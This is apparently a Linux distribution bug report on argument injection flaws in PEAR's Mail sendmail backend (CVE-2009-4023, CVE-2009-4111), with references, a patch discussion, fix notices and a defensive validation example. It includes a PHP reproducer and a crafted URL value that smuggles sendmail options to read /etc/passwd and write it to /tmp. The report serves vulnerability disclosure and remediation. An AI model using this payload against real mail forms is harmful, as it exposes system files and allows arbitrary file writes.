PEAR's Mail class did not properly escape the content of mail header fields when using the sendmail backend. A remote attacker could send an email message with specially-crafted headers to a local user, leading to disclosure of content and potentially to modification of arbitrary system files, once the email message was processed by PEAR's Mail class.

References:
-----------
http://pear.php.net/bugs/bug.php?id=16200
http://bugs.debian.org/557121
http://secunia.com/advisories/37410/
http://www.debian.org/security/2009/dsa-1938

Upstream patch:
---------------
http://pear.php.net/bugs/bug.php?id=16200&edit=12&patch=quick-fix&revision=1241757412

Please also pay attention to the comment:
[2009-11-21 08:19 UTC] rgeissert (Raphael Geissert)
which suggests the proposed patch might be incomplete.

CVE Request:
------------
http://www.openwall.com/lists/oss-security/2009/11/23/13
Reproducer:
-----------

    <?php
    // Make the PEAR Mail package findable; adjust to the local PEAR path if needed.
    ini_set('include_path', ini_get('include_path') . ':/usr/local/lib/php/PEAR:');
    require_once("Mail.php");

    // The From header is taken unvalidated from the request; this is what the
    // sendmail backend ends up placing on the sendmail command line.
    $from = "From: " . $_REQUEST['email'] . "\r\n";
    $to   = "xxxxxxx";
    $subj = "subscription request";
    $body = "test";

    $hdrs = array(
        "To"      => $to,
        "From"    => $from,
        "Subject" => $subj,
    );

    $mail =& Mail::factory('sendmail');
    $mail->send($to, $hdrs, $body);
    ?>

test.php?1=3&email=xxxxx%09-C%09/etc/passwd%09-X%09/tmp/wokao%09zzz@x%09.com&l=2&1=3

Note: You might need to change the path to ':/usr/share/pear/:'. After this I can view the content of my /etc/passwd with some add-ons as /tmp/wokao.
This issue affects the versions of the php-pear-Mail package as shipped with Fedora releases 10, 11 and 12, and as shipped with the Extra Packages for Enterprise Linux 5 (EPEL-5) project. Please fix.
This is CVE-2009-4023.
php-pear-Mail-1.1.14-5.el5.1 has been submitted as an update for Fedora EPEL 5. http://admin.fedoraproject.org/updates/php-pear-Mail-1.1.14-5.el5.1
Common Vulnerabilities and Exposures assigned a separate identifier of CVE-2009-4111 for the missing sanitization of the $recipients header of php-pear-Mail:

Argument injection vulnerability in Mail/sendmail.php in the Mail package 1.1.14, 1.2.0b2, and possibly other versions for PEAR allows remote attackers to read and write arbitrary files via a crafted $recipients parameter, and possibly other parameters, a different vulnerability than CVE-2009-4023.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4111
http://www.openwall.com/lists/oss-security/2009/11/23/8
http://www.openwall.com/lists/oss-security/2009/11/28/2
http://pear.php.net/bugs/bug.php?id=16200
https://bugs.gentoo.org/show_bug.cgi?id=294256
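Both reports above (the From header in CVE-2009-4023 and the $recipients parameter in CVE-2009-4111) come down to the same defect: an address string is placed on the sendmail command line without being validated or quoted, so whitespace-separated fragments become extra options. The following is an added illustration of the defensive check a hardened backend needs; it is not PEAR's code or its patch, and the function names, the sendmail path and the sample inputs are assumptions constructed for this example.

```php
<?php
// Added example, not PEAR's code: validate addresses and header values
// strictly before anything reaches a sendmail command line.
// Function names are hypothetical.

// Accept only a plain addr-spec: no whitespace, no control characters, and
// nothing that sendmail could read as an option (a leading '-').
function is_safe_address(string $addr): bool {
    $addrSpec = '/^[A-Za-z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/';
    return (bool) preg_match($addrSpec, $addr) && $addr[0] !== '-';
}

// Header names and values must not contain CR, LF or any other control
// character (tab included); the tab-separated reproducer above relies on
// exactly those characters being passed through.
function is_safe_header_value(string $value): bool {
    return preg_match('/[\x00-\x1F\x7F]/', $value) === 0;
}

// Build the sendmail command the way a hardened backend would: every address
// is validated, then quoted with escapeshellarg() so that it can only ever be
// one argument. Returns null if any input fails validation.
function build_sendmail_command(string $from, array $recipients, array $headers,
                                string $sendmail = '/usr/sbin/sendmail'): ?string {
    if (!is_safe_address($from)) {
        return null;
    }
    foreach ($recipients as $rcpt) {
        if (!is_safe_address($rcpt)) {
            return null;
        }
    }
    foreach ($headers as $name => $value) {
        if (!is_safe_header_value((string) $name) || !is_safe_header_value($value)) {
            return null;
        }
    }
    $cmd = $sendmail . ' -i -f' . escapeshellarg($from);
    foreach ($recipients as $rcpt) {
        $cmd .= ' ' . escapeshellarg($rcpt);
    }
    return $cmd;
}

// Constructed inputs: a normal address, and one shaped like the reproducer's
// tab-separated option injection. The second must be rejected.
$good = 'alice@example.com';
$bad  = "alice@example.com\t-X\t/tmp/out";
echo build_sendmail_command($good, ['bob@example.com'], ['Subject' => 'hi']) ?? 'rejected', "\n";
echo build_sendmail_command($bad,  ['bob@example.com'], ['Subject' => 'hi']) ?? 'rejected', "\n";
```

A backend that validates this way rejects both the crafted From value and a crafted $recipients entry before popen() is ever reached, which is why the fix for one CVE is incomplete unless it covers every value that ends up on the command line.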
php-pear-Mail-1.1.14-5.fc11 has been pushed to the Fedora 11 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.fc12 has been pushed to the Fedora 12 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.fc10 has been pushed to the Fedora 10 stable repository. If problems still persist, please make note of it in this bug report.
php-pear-Mail-1.1.14-5.el5.1 has been pushed to the Fedora EPEL 5 stable repository. If problems still persist, please make note of it in this bug report.